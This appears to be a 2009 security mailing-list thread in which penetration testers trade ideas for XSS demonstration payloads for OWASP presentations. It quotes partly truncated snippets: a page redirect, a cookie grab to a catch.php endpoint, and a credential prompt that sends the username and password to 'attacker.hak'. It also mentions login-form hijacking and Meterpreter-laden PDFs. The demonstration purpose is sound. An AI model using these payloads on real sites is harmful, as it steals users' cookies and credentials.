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Cool things to inject via XSS

From: mick at (Michael Douglas)
Date: Fri, 29 May 2009 07:45:10 -0400

While all these samples are really fun, I've lately had great luck by
making two different XSS attacks when I'm showing folks.

One for the devs -- this tends to be a bit more "fun" and does stuff
like click trapping.

For marketing or the project managers -- the ones I've found most
likely to sweep these bugs under the rug -- I send them "brand damage"
examples.  (Cock ring size is freaking hilarious, but would send me to
HR).  So I do things like image swapping, or setting the background to
a LOLCat or a competitor logo.

The all time XSS FTW moment was about 4 years ago now, when someone
found an XSS problem on a McDonald's site.  Their link was so damn
sweet, it's what got me interested in web app security.  when you
clicked it, you we sent to a page that had all the McD's wrappings but
the content section of the window was blank except for in lovely red
letters it said: "Hey FATTIE! You really shouldn't be eating our

On Fri, May 29, 2009 at 3:35 AM,  <christopher.riley at> wrote:
You could use a couple of typical password/cookie stealing examples.

Cookie stealing iframe.:
height="1" width="1" frameborder="0"></IFRAME>

Altering the logon form.:
"><script>window.onload =

I like to use the logon form example for my penetration testing
presentations as it looks 100% normal to the user, except it redirects the
Submit button to send the logon information (username/password in most
cases) to your evilserver instead of the real server. You can also rewrite
the code in the users browser to remove password hashing to make it easier
to get the clear text password. On the server end I usually just put up a
Metasploit HTTP or a netcat listener on the address to output
the traffic to a logfile. You can also log it to a Database for mass farming
of data, but we don't do that kind of thing, we leave that to Bob ;)

If you want something evil on the client-side, try an iframe that references
a PDF file. You can then export a PDF from Metasploit and embed the
Meterpreter payload for total world domination.

Chris John Riley

pauldotcom-bounces at wrote on 28.05.2009 20:50:39:

Ok, I've got yet another presentation coming up, this time on the OWASP
Top 10
and Mutillidae. One of the things I'm going to cover is XSS. The canonical
example of course is:


but that is boring, and gives folks the impression that XSS is not that
serious.? Better short eample swoul be:

Redirect traffic to your site:
<script>window.location = "";</script>

A little cookie Grabbing:
new Image().src="http://some-ip/mutillidae/catch.php?cookie=

Or maybe a password form to make people think they have to login, but it
grabs the credentials:
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://attacker.hak/catch.php?username=

What are other cool thing to inject, besides maybe BeEF, that shows of how
can be a big deal?

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